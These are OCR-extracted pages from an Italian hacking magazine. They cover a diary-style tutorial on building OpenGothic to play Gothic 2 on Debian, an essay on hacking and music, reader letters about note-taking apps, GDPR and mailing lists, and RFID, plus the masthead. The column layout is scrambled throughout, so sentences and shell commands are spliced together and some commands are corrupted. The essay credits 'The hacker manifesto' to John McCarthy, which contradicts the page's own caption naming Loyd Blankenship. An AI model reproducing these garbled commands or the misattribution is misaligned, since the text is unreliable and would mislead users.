SEMAFORO ROSSO IMPOSTAZIONI AVANZATE


Cliccando sulla freccia che punta verso il basso, si aprirà Cliccando sul menu delle impostazioni, avrete la
un menu con tutti i tracker bloccati, quelli che lasciano possibilità di personalizzare Privacy Badger. Troverete la
sono dei cookie e quelli che non sono stati fermati. Per possibilità di impedire ai siti di tracciare i link cliccati, di
consentire, fermare o accettare solo i cookie, vi basta vietare a Google di registrare i siti visitati, di consultare i
spostare le levette da destra a sinistra, o viceversa. siti disattivati, i domini tracciati e tanto altro.

51
HOW TO

GOTHIC 2 CONQUISTA
ANCHE IL PINGUINO!
Siamo riusciti a installare su Linux questo mitico gioco di ruolo.
Ecco il diario della ricompilazione

othic è un gioco per Windows

G
installare la versione opensource
IN BREVE del 2001. Ma non solo. È del motore grafico di Gothic! La
In questa guida vi anche uno spartiacque, una scelta, nello specifico, è ricaduta sul
faremo vedere come pietra miliare etichettata motore di Gothic 2, una versione più
installare Gothic 2,
come la linea guida per tutti i titoli che evoluta rispetto alla precedente.
gioco per Windows del
2001, anche sul sono venuti dopo. Ambientato Per farlo, vi narreremo le operazioni
sistema del “pinguino” indicativamente in epoca medievale, compiute come se le stessimo
DIFFICOLTÀ
annovera paladini, maghi, draghi, scrivendo su un vero e proprio
non-morti, guerrieri e una pletora di diario personale. Il fine sarà
PNG (Personaggi Non Giocanti) che supportare Gothic 2, comprensivo
possono diventare alleati o nemici a dell’espansione “La notte del Corvo”,
seconda delle azioni che si compiono. arrivando, dopo una serie di
È un modo “vivo”: c’è il ciclo notte/ operazioni, non semplicissime, a
giorno, la pioggia... e i personaggi che giocare questo bellissimo titolo su
mangiano, dormono e lavorano… Linux [figura #1].
certo, tutte cose “normali” oggi, ma
rivoluzionarie all’uscita. MIO CARO DIARIO...
La storia vede gli orchi invasori venuti La prima cosa che faccio è
ad attaccare le terre degli umani, che scompattare il file del gioco, azione
sono sul punto di soccombere. Sarà fattibile con programmi come ZIP o 7z.
compito del protagonista, risollevare le Va storto qualcosa e il file non viene
sorti della popolazione. riconosciuto.
Perché vi parliamo di tutto questo? Cominciamo bene! Così decido di agire
Semplice, perché vi mostreremo come in un modo più lungo, ma credo che

figura #1
funzionerà, utilizzando macchine
Durante il gioco, virtuali (MV) e un disco rigido di
l’eroe si troverà servizio su cui fare le varie prove, allo
davanti una scopo di non contaminare la mia
colonia penale: installazione principale. Mi procuro:
riuscirà a
entrare? • Immagine ISO di istallazione di
Widows XP;
• File exe di installazione di Gothic 2 “La
notte del Corvo”

52
IL DIARIO DI UNA RICOMPILAZIONE
figura #2 L’installazione e preambolo. Si sentono i dialoghi
del gioco su iniziali ma non si vede la grafica,
macchina ma tanto mi basta per capire che il
virtuale è gioco è installato correttamente.
necessaria per Spengo Windows e passo alla
recuperare i file parte GNU/Linux. Creo un
di gioco. file-disco da 10 GB per Debian 11,
recupero la ISO di installazione e
avvio la VM:

$ dd if=/dev/zero of=debian_11.
img bs=1M count=10240
immagine_iso_windows_xp.iso
• Immagine ISO di istallazione di $ wget https://cdimage.debian.
-boot d
Debian 11 org/debian-cd/current/amd64/
• Hard disk di recupero (nel mio iso-cd/debian-11.6.0-amd64-
caso, un vecchio disco da 40 GB) procedo con l’installazione e, una netinst.iso
• Capacità nel destreggiarsi a riga volta completata, spengo la $ kvm -m 2G -hda debian_11.img
di comando, esperienza nel macchina virtuale. Ora devo -cdrom debian-11.6.0-amd64
“problem solving” e pazienza :-) passare il file di setup alla VM -netinst.iso -boot d
Windows: un trucco è “formattare”
L’ambiente di lavoro è un PC a 64 il file da passare come se fosse Per Debian installazione testuale,
bit con Debian GNU/Linux, un l’immagine ISO di un CD che potrà una partizione sola, niente swap,
disco primario (SDA) con il sistema quindi essere montato come se niente grafica o programmi di
operativo e un disco (SDB) fosse un CD fisico: supporto: lo stretto necessario!
secondario, che sarà il contenitore Poi, spengo la macchina virtuale
del sistema finale con – si spera $ cd per escludere la ISO di
– opengothic funzionante. $ mkdir g2_tmp installazione e per agganciare
Il sistema dispone dei programmi $ cp setup_gothic_2_gold_ l’immagine Windows [figura #3].
necessari (quali kvm, wget ecc.). edition.exe g2_tmp/ Riavvio con:
Come sempre, il simbolo # $ mkisofs -o g2.iso g2_tmp/
indica che lavoro come $ rm g2_tmp/setup_gothic_2_ $ kvm -m 2G -hda debian_11.img
amministratore mentre il gold_edition.exe -hdb windowsXP.img
simbolo $ indica che il comando $ rmdir g2_tmp
è impartito da un utente. attivo i repository extra con:
Riavvio la macchina virtuale
ORA LAVORO SUL PC, SDA aggiungendo l’immagine ISO: # nano /etc/apt/source.list
Creo un file-disco da 8 GB per
Windows: $ kvm -m 2G -hda windows_XP.img e aggiungo “contrib non-free”
$ cd -device AC97 -vga cirrus -cdrom dopo il primo “main”: salvo con
$ dd if=/dev/zero of=windows_ g2.iso Ctrl-X, confermo con “s”.
XP.img bs=1M count=8192
All’interno della MV Windows, Aggiorno e installo quanto segue:
avvio la macchina virtuale nella l’immagine g2.iso viene vista come
quale installerò la mia copia di se fosse un CD, che uso per # apt-get update
Windows XP: eseguire l’installazione [figura #2]. # apt-get install wget
Lancio il gioco e, dopo qualche firmware-misc-nonfree firmware-
$ kvm -m 2G -hda windows_XP.img secondo, parte la sigla: schermata realtek mc net-tools lxde
-vga cirrus -device AC97 -cdrom nera, poi il video di presentazione firefox

53
HOW TO
Siccome la macchina fisica figura #3 Per risparmiare
dispone di una scheda video tempo,
NVIDIA e che alla fine la VM Linux l’installazione di
andrà riversata su SDB, il Debian deve
pacchetto firmware-misc- essere minimale:
nonfree mi serve per supportare solo quello che
l‘hardware reale serve!
attivo la grafica con:

# /etc/init.d/lightdm restart

Poi mi connetto come “utente”,


monto la VM Windows e copio in
/home/utente la directory
“Gothic 2 Gold” presente nel Ma ecco la prima tegola in testa: versione 10.2.1-6 sta per essere
disco Widows nel percorso I seguenti pacchetti hanno installata
Progammi/GOG.com/ e siccome dipendenze non soddisfatte: [avanti così per una ventina di righe]
non mi piacciono gli spazi nei vulkancapsviewer : Dipende: E: Impossibile correggere i problemi,
nomi di file e/o directory, qt5-default ma non è installabile ci sono pacchetti danneggiati
rinomino “Gothic 2 Gold” in E: Impossibile correggere i problemi, bloccati.
“Gothic_2_Gold” sostituendo gli ci sono pacchetti danneggiati
spazi col “trattino basso”. Poi bloccati. Il messaggio è chiaro: i programmi
spengo la VM Linux e la riverso root@debian:~# che mi servono dipendono dalle
sul disco: libc6, librerie fondamentali di
rimugino un po’, poi vado a vedere sistema, che sono però richieste
# dd if=debian_11.img of=/dev/ il link: https://packages.lunarg.com/ nella versione maggiore o uguale
sdb bs=1M vulkan/ mmm… interessante... alla 2.34, ma al massimo sono
oltre alla lista di “focal”, c’è anche la disponibili nella versione
Attivo gparted ed espando lista di “jammy”, cioè ubuntu 22.04 2.31-13+deb11u5. Questo significa
l’immagine presente su SDB per LTS, e quindi di due anni più una cosa sola: Debian 11 stabile
portala dai 10 GB [figura #4]. recente. Me la rischio e aggiungo non è aggiornato, occorre passare
Riavvio la macchina fisica e anche il suo repository: a debian testing, cioè la versione in
tramite BIOS scelgo di avviare dal lavorazione che diventerà la futura
disco da 40GB. # wget -qO /etc/apt/sources. Debian 12. Viene quindi buono il
Con Firefox raggiungo il sito https:// list.d/lunarg-vulkan-jammy.list fatto di aver fatto una installazione
github.com/Try/OpenGothic e subito http://packages.lunarg.com/ minimale. Va bene, edito /etc/apt/
identifico le istruzioni per installare vulkan/lunarg-jammy-focal.list surce.list e aggiungo le righe:
su GNU/Linux, che faccio: # apt-get update
deb http://deb.debian.org/
# wget -qO - http://packages. va bene, un passo avanti: il debian/ testing main contrib
lunarg.com/lunarg-signing-key- messaggio di errore è cambiato, non-free
pub.asc | apt-key add - ma sembra un peggioramento: deb-src http://deb.debian.org/
# wget -qO /etc/apt/sources. I seguenti pacchetti hanno debian/ testing main
list.d/lunarg-vulkan-focal.list dipendenze non soddisfatte:
http://packages.lunarg.com/ dxc : Dipende: libc6 (>= 2.34) ma la dopodiché aggiorno con:
vulkan/lunarg-vulkan-focal.list versione 2.31-13+deb11u5 sta per
# apt-get update essere installata # apt-get update
# apt-get install vulkan-sdk Dipende: libstdc++6 (>= 11) ma la # apt-get upgrade

54
IL DIARIO DI UNA RICOMPILAZIONE
# apt-get install libvulkan-dev
nei vari messaggi vedo scorrere Va bene, anzi no, non va bene
l’informazione che mi interessa: niente… però calma, dai,
libc6 viene aggiornata alla versione ragioniamo: evidentemente le e stavolta va tutto bene! Mi
2.36-8. Finito l’aggiornamento, versioni di libvulkan-dev e vulkan- rincuoro e ci riprovo:
tramite il comando: headers non sono identiche.
# apt-get install vulkan-sdk
# dpkg -l | grep libstdc/+6 Indago sui due pacchetti con:
# apt-cache show libvulkan-dev ma ancora una volta, errore, lo
osservo che tale libreria è ancora | grep Version stesso di prima dell’incolpabilità
ferma alla versione 10.2.1-6: no # apt-cache show vulkan-headers tra le versioni di vulkan-headers e
buono! Potrei installarla | grep Version libvulkan-dev… la cosa mi pare
singolarmente, ma fatto trenta, strana: i due pacchetti sono stati
faccio trentuno: aggiorno il sistema e vedo che ci sono MOLTE versioni installati e non hanno dato
completamente con: di entrambi i pacchetti ma per problemi, perché il tentativo
coerenza, vanno installati nella d’installazione di vulkan-sdk dà
# apt-get dist-upgrade STESSA IDENTICA versione. problemi? Non ha molto senso.
# reboot Domanda: come fare in modo che Allora, ragioniamo e alla fine, che
apt scelga una determinata cosa è questo benedetto vulkan-
Al riavvio, noto che lo sfondo di versione? Un rapido giro di giostra sdk? Decido di “guardarci dentro” e
grub e Desktop sono cambiati da in Internet mi fornisce la risposta: lo scarico con:
un deciso blu a un delicato mettere “=<versione>” dopo il
acquamarina, a indicare che sono nome del pacchetto, cosa che $ apt-get download vulkan-sdk
in testing. Ci riprovo: faccio:
mmm… un totale di 5KB… COSÌ
# apt-get install vulkan-sdk # apt-get install libvulkan- POCO? Cosa c’è dentro?!
dev=1.2.148.0-1lunarg20.04-1 Il pacchetto .deb si chiama
Risposta del sistema: vulkan-sdk_1.3.239.0~rc2-
e poi ancora: 1lunarg22.04-1_all.deb che,
I seguenti pacchetti hanno come noto, non è altro che un
dipendenze non soddisfatte: # apt-get install vulkan-sdk archivio di file: attivo midnight
libvulkan-dev : Rompe: vulkan- comander che permette anche
headers ma la versione ma di nuovo, un errore! Siccome di leggere all’interno dei file deb.
1.3.239.0~rc2-1lunarg22.04-1 sta deriva dagli headers, cosa Seleziono il file, premo Invio ed
per essere installata accadrebbe se tentassi di installare “entro” nell’archivio .deb. Navigo
E: Impossibile correggere i problemi, SOLO quel pacchetto? Ci provo: dentro le varie directory
ci sono pacchetti danneggiati CONTENTS/usr/share/doc/
bloccati. # apt-get install vulkan- vulkan-sdk, poi con F3 edito il
root@debian:~# headers file README.debian e… sorpresa!
C’è un elenco di pacchetti!

figura #4 Con gparted,


Vulkan-sdk quindi è solo un
meta-pacchetto, cioè contiene un
l’immagine elenco di librerie da installare!
riversata sul disco Copio README.debian e lo
fisico può essere stampo:
espansa per
occuparlo $ cat README.debian
completamente.
ed ecco l’elenco dei pacchetti che

55
HOW TO
lunarg-vulkan-layers spirv-
mi interessano:
headers spirv-tools spirv-cross
• libvulkan1
• libvulkan-dev
glslang-tools glslang-dev
Driver audio
• vulkan-headers
• vulkan-validationlayers
shaderc
In questo progetto, abbiamo
necessariamente installato il
driver NVIDIA, in quanto
• vulkan-validationlayers-dev E lo stesso errore! Installo NOUVEAU, il driver opensource,
• vulkan-tools pacchetti uno alla volta? Ah, no per tale hardware, non riusciva a
• lunarg-via aspetta! Nella lista avevo messo gestire l’accelerazione grafica e il
comparto audio HDMI.
• lunarg-vktrace anche libvulkan-dev vulkan-
• lunarg-vulkan-layers headers che però sono già
$ cd OpenGothic
• spirv-headers installati! Li rimuovo e rilancio:
$ cmake -B build -DBUILD_
• spirv-tools
SHARED_LIBS=ON -DCMAKE_BUILD_
• spirv-cross # apt-get install libvulkan1
TYPE:STRING=RelWithDebInfo
• glslang-tools vulkan-validationlayers vulkan-
• glslang-dev validationlayers-dev vulkan-
• shaderc toolslunarg-via lunarg- Ed ora, il colpo di grazia:
gfxreconstruct
ora si tratta di installarli, con: lunarg-vulkan-layers spirv- $ make -C build -j8
headers spirv-tools spirv-cross
# apt-get install libvulkan1 glslang-tools glslang-dev Il sistema compila e macina… Alla
libvulkan-dev vulkan-headers shaderc fine, il parametro “-g“ indica il
vulkan-validationlayers percorso dove si trovano i dati.
vulkan-validationlayers-dev Parte lo scarico e l’installazione. Ora, la directory in cui lo avevo
vulkan-toolslunarg-via Torno alla pagina Internet delle salvato è /home/utente/Gothic_2_
lunarg-vktrace lunarg-vulkan istruzioni e prelevo il prossimo: Gold e l’eseguibile si trova in /
-layers spirv-headers spirv home/utente/OpenGothic/build/
-tools spirv-cross glslang # apt install git cmake g/+ opengothic ed è lì che mi sposto
-tools glslang-tools libvulkan-dev
glslang-dev shaderc libasound2-dev libx11-dev $ cd /home/utente/OpenGothic/
libxcursor-dev build/opengothic
Ma ottengo il messaggio: E:
Impossibile trovare il pacchetto Dopo, passo alla ricompilazione: Incrociamo le dita e…
lunarg-vktrace
$ cd $ ./Gothic2Notr.sh -g /home/
Mi butto su Internet, e dopo un po’ $ git clone /-recurse- utente/Gothic_2_Gold/
scopro che lunarg-vktrace è submodules https://github.com/
obsoleto e rimpiazzato da lunarg- Try/OpenGothic.git PARTITO! [figura #5].
gfxreconstruct, ragion per cui
rilancio il comando di prima
avendo cura di sotituire lunarg-
figura #5 Opengothic in tutto
il suo splendore! Il
vktace con lunarg-gfxreconstruct: motore grafico
opensource
# apt-get install libvulkan1 raggiunge
libvulkan-dev vulkan-headers risoluzioni video
vulkan-validationlayers vulkan- superiori alla
validationlayers-dev vulkan- versione originale
toolslunarg-via lunarg- proprietaria.
gfxreconstruct

56
HACKERJOURNAL.IT

Il punto di riferimento per chi fa dell’hacking


una filosofia di vita
La crew di Hacker Journal ti aspetta ogni giorno sul nuovo sito Web, il ritrovo della sua ricca comunità
hacker. Troverai anticipazioni degli articoli, news dal mondo della (in)sicurezza, contest, offerte speciali
e un forum che vuole essere il punto di riferimento per chiunque voglia diventare un esperto di sicurezza.
In un periodo storico in cui governi e multinazionali si divertono a spiare tutto e tutti, sulle pagine
della rivista e sul sito scoprirai come difenderti e contrattaccare. #HJisBACK

Scopri il sito e la comunità di Hacker Journal


Forum: iscriviti subito e inizia a dialogare con la redazione e la comunità di HJ

News: le ultime notizie su cyberintrusioni, furti


di credenziali, bug, malware e altro ancora

Contest: metti alla prova le tue conoscenze


con i giochi e le sfide della redazione

Collezione HJ: i vecchi numeri della rivista,


in PDF, da scaricare

Invia un articolo: ti piace scrivere e hai un’idea


originale per un articolo? Inviacela e la valuteremo!
HACKULTURE

I L L AT O
“ S O N O R O ”
DEL L’ H A C K I N G
uno spirito di sfida e innovazione.
È una danza sorprendente, un
balenare tra circuiti e sinfonie
quello che hacking e musica
pionieri nel mondo dell’hacking
– aveva legami profondi con la
scena underground degli anni ‘80.
Un modo di vedere le cose che ha
trovato eco anche nel parallelo
hanno tracciato nel corso della È stata una sovrapposizione di universo musicale, in cui artisti
storia. Un percorso parallelo, che mondi, quindi, che ha trovato con una profonda passione per
ha messo in luce come la conferma in documenti come “The l’hacking si sono avventurati nella
tecnologia e l’arte possano hacker manifesto” di John manipolazione dei sintetizzatori
fondersi nell’unica armonia della McCarthy, dove un grido di analogici, spingendosi oltre i
creazione. ribellione parla di libertà e confini della composizione
conoscenza, da perseguire con classica. Una ricerca incessante di
LA STORIA
Le origini di questa simbiosi sono
da rintracciare in luoghi come il
Tech Model Railroad Club
(TMRC) del MIT, un posto che non
era solo un seminario per gli
appassionati di modellismo
ferroviario, ma anche una vera e
propria culla per gli esploratori del
suono. Mentre alcuni membri si
adoperavano con interruttori e
circuiti, altri erano allo stesso John McCarthy,
tempo affascinati dalla “creazione vincitore del premio
sonora”, anticipando così un’era in Premio Turing nel ’71
per i suoi contributi
cui l’alterazione della tecnologia
nel campo dell’IA
avrebbe portato anche a nuove nonché inventore del
frontiere musicali. Era termine “Intelligenza
un’intersezione, un connubio tra Artificiale”, era
tecnologia e arte, che ha forse membro del Tech
gettato le basi per future Model Railroad Club.
Inventò tra l’altro il
generazioni di hacker, tra cui
linguaggio Lisp. Ci ha
gruppi noti come i Cult of the lasciati nel 2011.
Dead Cow che – pur essendo tra i

58
HACKING E MUSICA
e r si im m e rg e n e l codice,
Come l’hack
mus ici sta na v i ga tra note
così il s i l’ob iettivo
r am b i i ca
e frequenze. In ent ne, c reare!
c op ri r e e , in fi
è manipolare, s

hacker ha influenzato
profondamente l’industria
musicale anche in termini di
distribuzione e accesso. La
filosofia opensource, tanto cara al
cuore degli hacker, ha stimolato la
nascita di piattaforme di
streaming indipendenti, software
di produzione musicale gratuiti e
Loyd Blankenship, noto hacker statunitense, famoso per aver scritto il saggio
repository online dove gli artisti
“La coscienza di un Hacker”, che in seguito diventerà “The Hacker Manifesto”, è
un appassionato di sintetizzatori.
possono condividere
campionamenti, loop e strumenti.
nuove espressioni, sia nel codice la scena musicale elettronica, Questa democratizzazione
sia nella musica, che forse permettendo una manipolazione dell’accesso ha portato a
sottolinea una verità del suono mai vista prima. un’esplosione di creatività, con
fondamentale: nel cuore di ogni Gli ambienti di programmazione artisti provenienti da ogni angolo
hacker c’è un desiderio di come Pure Data e Max/MSP hanno del mondo che possono ora
esplorare, di innovare e di creare, permesso ai musicisti di collaborare, remixare e creare
una passione che risuona “hackerare” il suono, creando insieme. Infine, il mondo
profondamente con l’anima del strumenti personalizzati e dell’hacking ha influenzato anche
musicista. manipolando l’audio in tempo il modo in cui la musica viene
reale. Tali software, essendo vissuta. Dalle visualizzazioni
SINERGIA IN altamente modulabili, sono algoritmiche che accompagnano
EVOLUZIONE diventati luoghi di la musica elettronica ai festival,
Nel mondo contemporaneo, il sperimentazione, dove le capacità alla creazione di ambienti
legame tra musica e hacking si è di un hacker si fondono con la immersivi basati su realtà virtuale
rafforzato e diversificato in modi creatività di un compositore. Allo e aumentata, la tecnologia sta
sorprendenti, alimentato dalle stesso modo, piattaforme come ridefinendo l’esperienza
incessanti innovazioni Arduino e Raspberry Pi hanno dell’ascolto. In sintesi, nel
tecnologiche e da una crescente dato vita a strumenti musicali DIY, panorama attuale, musica e
cultura di condivisione e interfacciamenti e sintetizzatori, hacking non sono solo intrecciati:
collaborazione. Mentre un tempo facendo emergere una nuova sono diventati simbiotici. Insieme
gli hacker utilizzavano i primi generazione di “maker” musicali. stanno ridefinendo i confini
computer per esplorare le dell’espressione artistica,
potenzialità sonore, oggi DEMOCRATIZZAZIONE mostrando che, quando
assistiamo a un’era in cui software Ma il legame va oltre la semplice tecnologia e arte si fondono, le
e hardware opensource dominano creazione di strumenti. La cultura possibilità sono infinite!

59
REDAZIO N E @ H A C K E R JO U R N A L .I T

REPLY
Condividi i tuoi dubbi co
a nuove idee e suggerim
su quello che vorresti
n la redazione insieme
enti
vedere sulla rivista:
nal.it
redazione@hackerjour

UN SISTEMA DIGITALE PER vantaggi del digitale. Un


ARCHIVIARE GLI APPUNTI esempio? Il Taccuino Digitale
Salve, da tempo, per lavoro Intelligente HUION Note X10, che
prendo appunti su blocchi offre un ottimo rapporto qualità/
cartacei. E ora vorrei trasferirli prezzo. (Lo trovi qui: https://www.
in digitale. Cosa posso utilizzare short.tips/url/hjnotex10). Una volta
per i miei scopi? che hai trasferito i tuoi appunti in
Gianmarco formato digitale, potresti voler
e trasformarla in un file PDF o considerare l’utilizzo di software
Ciao, Gianmarco. Il mondo immagine. Queste applicazioni per la gestione degli appunti.
digitale offre una vasta spesso includono funzioni di Applicazioni come Evernote,
gamma di strumenti per riconoscimento ottico dei Microsoft OneNote o Notion ti
semplificare e migliorare la caratteri (OCR), che convertono le permettono di organizzare,
gestione degli appunti. immagini scansionate in testo categorizzare e cercare
L’importante è trovare la modificabile, permettendoti di facilmente i tuoi appunti. Molte
soluzione che meglio si adatta effettuare ricerche all’interno dei di queste offrono anche funzioni
alle tue esigenze e al tuo stile di documenti o di modificarli. Un di sincronizzazione tra dispositivi,
lavoro. altro approccio consiste consentendo di accedere ai tuoi
Iniziamo col dire che il passaggio nell’utilizzare delle tavole digitali appunti da smartphone, tablet o
dal cartaceo al digitale è una o taccuini elettronici. computer.
tendenza sempre più diffusa in Questi dispositivi ti permettono
molti ambiti lavorativi, di scrivere o disegnare come lo CHE VALORE HANNO
soprattutto considerando la faresti su un normale foglio di GLI INDIRIZZI
crescente necessità di avere carta, ma con il vantaggio di DI UNA MAILING LIST?
documenti organizzati, avere immediatamente tutto in Salve, vi scrivo per avere
facilmente accessibili e formato digitale. chiarimenti su un fatto
condivisibili. Un primo metodo, e Alcuni di questi dispositivi sono avvenuto circa 3 anni fa. Un
forse il più immediato, consiste dotati di una speciale penna e un giorno mi arriva una e-mail di
nell’utilizzare uno scanner o delle sensore che rileva la posizione una nota società di
app per smartphone che della stessa, convertendo in infrastrutture radio italiana,
trasformano la fotocamera del tempo reale quello che scrivi o con un messaggio per me non
telefono in uno scanner portatile. disegni in un file digitale. Il pertinente, parlava di
Ce ne sono molte, come vantaggio principale è che ti modifiche di accesso al loro
CamScanner o Microsoft Office permettono di avere sito. Il fatto è che mi sono
Lens, che ti permettono di un’esperienza simile alla scrittura arrivati più di 300 indirizzi
scattare una foto al tuo appunto su carta, ma con la comodità e i e-mail in chiaro.

60
APPUNTI DIGITALI, MAIL E RFID
azioni legali sia penali che civili. E
le multe per la violazione delle
leggi sulla protezione dei dati
possono essere considerevoli.

COS’È IL SISTEMA RFID?


Salve, ho sentito parlare di
tecnologia RFID. Mi spiegate di
cosa si tratta e dove viene
utilizzata. Grazie mille.
Giada

RFID è l’acronimo di Radio-


Frequency Identification. Si
tratta di una tecnologia utilizzata
La mia domanda è: questi servizio o marca. per identificare, tracciare e
indirizzi hanno un valore Tuttavia, la semplice raccolta di leggere informazioni di oggetti,
commerciale sul Web? Posso indirizzi email senza un contesto, persone o animali attraverso
distribuirli e comunicarli ad senza sapere da dove onde radio. Il sistema è composto
altri? Se lo faccio vado incontro provengono, quali sono i loro da due componenti: un tag (o
ad azioni legali penali e/o civili? interessi o se hanno dato il etichetta) e un lettore. Il tag, che
Saluti. consenso per essere contattati, può essere attaccato o
Miro potrebbe non avere lo stesso incorporato in un oggetto,
valore. Ma attenzione: anche se contiene un microchip che
Ciao, Miro. La tua domanda potrebbe esserci un valore memorizza informazioni e
riguarda un argomento associato a questi indirizzi, ci un’antenna per trasmettere
molto delicato e importante sono molteplici questioni etiche queste informazioni al lettore.
nell’era dell’informazione: la e legali legate all’uso e alla Quando il tag passa vicino a un
protezione dei dati personali. distribuzione di tali dati. E quindi, lettore RFID, il microchip
Partiamo dalla tua prima passiamo alla seconda trasmette le informazioni al
preoccupazione, cioè se gli questione: gli aspetti legali e i lettore attraverso le onde radio.
indirizzi di una mailing list hanno rischi associati. Questa tecnologia ha una vasta
o no un valore commerciale. Da un punto di vista legale, in gamma di applicazioni. Può essere
Be’, sappi che gli indirizzi email molte giurisdizioni, inclusa utilizzata per la gestione di
sono diventati uno degli asset l’Europa con il suo Regolamento magazzini e inventari, per
più preziosi per le aziende e gli Generale sulla Protezione dei tracciare spedizioni, per il
operatori di marketing nel Dati (GDPR), utilizzare, distribuire controllo accessi in edifici o eventi,
contesto attuale. Sapere a chi o vendere indirizzi email senza il per i pagamenti contactless e
inviare informazioni, offerte o consenso esplicito dei proprietari molto altro. Un uso comune
comunicazioni è fondamentale è illegale. Questo significa che, riguarda anche i portafogli: molti
per chi opera in ambito anche se tecnicamente hai in articoli moderni sono dotati di
commerciale e pubblicitario. Una mano una mailing list, non hai il protezione RFID per impedire la
mailing list pulita, segmentata e diritto di utilizzarla per finalità lettura non autorizzata delle carte
aggiornata può avere un commerciali o di distribuirla, a di credito o dei documenti di
notevole valore commerciale meno che non si abbia il identità al loro interno. Come lo
poiché rappresenta un pubblico consenso delle persone SLim Porta Carte di Credito che
già interessato o almeno a coinvolte. Dunque, se lo fai, sì, trovi qui: https://www.short.tips/url/
conoscenza di un certo prodotto, potresti andare incontro ad hjslimcard.

61
u rn al sar à in edicola
Scovare la password Hack er Jo
via FTP: è ponoss ibile! 10 dei mesi d isp ari
to
Sfruttare il ogn i
are
protocollo per realizz
un accesso anonim o

Hackerare una
coffee mach ine
male...
Troppo caffè fa
Noi lo abbiamo fatto
solo per sicurezza!

Entrano
nel server
Una vulnerabilità
senzattelleopogtenziianlit!à
Tu
nel Pinguin o viene
anismo
Sapevi che il mecc
dell’attacco RDP: come
ersi
di memorizzazione
g?
eseguito e come difend
dei file presenta un bu

Il prezzo dell’abbonamento è calcolato in modo etico perché sia un servizio utile e non in sede legale in Via Torino, 51 Cernusco sul Naviglio (MI). Sprea S.p.a. tratta i dati identificativi
concorrenza sleale con la distribuzione in edicola. e particolari eventualmente raccolti nell’esercizio della prestazione contrattuale. La stessa La
Arretrati: si acquistano on-line su www.sprea.it/arretrati informa che i Suoi dati eventualmente da Lei trasmessi alla Sprea S.p.a., verranno raccolti,
abbonamenti@sprea.it Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00) trattati e conservati nel rispetto del decreto legislativo ora enunciato e nel pieno rispetto
329 3922420 dell’art. 32 GDPR Reg. UE 679/2016 per le finalità di trattamento previste per adempiere agli
obblighi precontrattuali, contrattuali e fiscali derivanti da rapporti con Lei in essere, per le
FOREIGN RIGHTS finalità amministrative e di contabilità, (con base giuridica contrattuale), per le finalità deri-
Paolo Cionti: Tel. 02 92432253 - paolocionti@sprea.it vanti da obblighi di legge ed esercizio di difesa in giudizio, nonché per le finalità di promozione
e informazione commerciale la cui unica base giuridica è basata sul consenso libero e incon-
dizionato dell’interessato, nonché per le altre finalità previste dalla privacy policy consultabile
SERVIZI CENTRALIZZATI sul sito www.sprea.it, connesse all’azienda.
Art director: Silvia Taietti Si informa che, tenuto conto delle finalità del trattamento come sopra illustrate, il conferimen-
Grafici: Alessandro Bisquola, Tamara Bombelli, Nicole Bombelli, Nicolò Digiuni, to dei dati necessari alle finalità è libero ma il loro mancato, parziale o inesatto conferimento
Bimestrale - prezzo di copertina 3,90 € Marcella Gavinelli, Luca Patrian potrà avere, come conseguenza, l’impossibilità di svolgere l’attività e gli adempimenti precon-
www.hackerjournal.it - redazione@hackerjournal.it Coordinamento: Chiara Civilla, Tiziana Rosato, Roberta Tempesta, Silvia Vitali trattuali e contrattuali come previsti dal contratto di vendita e /o fornitura di prodotti e servizi.
La Divisione Informatica di Sprea edita anche: Amministrazione: Erika Colombo (responsabile), Silvia Biolcati, Irene Citino, La avvisiamo, inoltre, che i Suoi dati potranno essere comunicati e/o trattati (sempre nel ri-
WIN MAGAZINE - LINUX PRO Desirée Conti, Sara Palestra - amministrazione@sprea.it spetto della legge), anche all’estero, da società e/o persone che prestano servizi in favore della
APP JOURNAL - IL MIO COMPUTER IDEA Ufficio Legale: Francesca Sigismondi Sprea che sono state nominate responsabili del trattamento ai sensi dell’art- 28 GDPR Reg. UE
679/2016. Si specifica che non sono effettuati trasferimenti dei dati al di fuori dell’Unione Euro-
Brand Manager: Massimiliano Zagaglia pea. Si specifica che Sprea S.p.a non effettua trattamento automatizzato di informazione e dati
Cover: Luca Patrian Hacker Journal, registrata al tribunale di Milano il 27/10/2003 con il numero 601. che produca effetti giuridici che Lal riguardano o che incida in modo analogo significativamen-
ISSN 1594-5774 te sulla Sua persona.In ogni momento Lei potrà chiedere la l’accesso ai sui dati, la rettifica dei
Realizzazione editoriale a cura di: Backdoor di Gianmarco Bruni Autorizzazione ROC n° 6282 del 29/08/2001 suoi dati, la cancellazione dei suoi dati, la limitazione al trattamento e la portabilità dei suoi dati,
Direttore responsabile: Luca Sprea nonché poi esercitare la facoltà di opposizione al trattamento dei Suoi dati ovvero esercitare
tutti i diritti previsti dagli artt. 15, 16, 17, 18, 20, 21 del GDPR Reg. UE 679/2016 e ss. Modifiche
Sprea S.p.A. Distributore per l’Italia: Press-Di Distribuzione stampa e multimedia s.r.l. di adeguamento legislativo del D.Lgs. 196/03, così come modificato dal D.Lgs 101/2018, me-
Sede Legale: Via Torino, 51 20063 Cernusco Sul Naviglio (Mi) - Italia 20090 Segrate diante comunicazione scritta alla Sprea e/o direttamente al personale Incaricato preposto al
PI 12770820152- Iscrizione camera Commercio 00746350149 Distributore per l’Estero: SO.DI.P S.p.A. Via Bettola, 18 - 20092 Cinisello Balsamo (MI) trattamento dei dati.
Per informazioni, potete contattarci allo 02 87168197 Tel. +390266030400 - Fax +390266030269 - sies@sodip.it - www.sodip.it Lei potrà altresì esercitare i propri diritti rivolgendosi al Garante della Privacy, con Sede
in Piazza Venezia n. 11 – 00187 Roma, Centralino telefonico: (+39) 06.696771,Fax: (+39)
CDA: Luca Sprea (Presidente), Alessandro Agnoli (Amministratore Delegato), 06.69677.3785. Per informazioni di carattere generale è possibile inviare una e-mail a: garan-
Giulia Spreafico (Divisione digital), Stefano Pernarella Stampa: Arti Grafiche Boccia S.p.A.- Via Tiberio Claudio Felice, 7- 84131 Salerno
te@gpdp.it @pec.it.
Sprea S.p.a. La informa che Lei ha il diritto, ai sensi dell’art. 7 GDPR Reg. UE 679/2016 di revo-
ADVERTISING, SPECIAL PROJECTS & EVENTS Copyright: Sprea S.p.A. care il consenso al trattamento dei suoi dati in qualsiasi momento.
Segreteria: Emanuela Mapelli - Tel. 02 92432244 - emanuelamapelli@sprea.it Informativa su diritti e privacy La lettura della presente informativa deve intendersi quale presa visione dell’Informativa ex
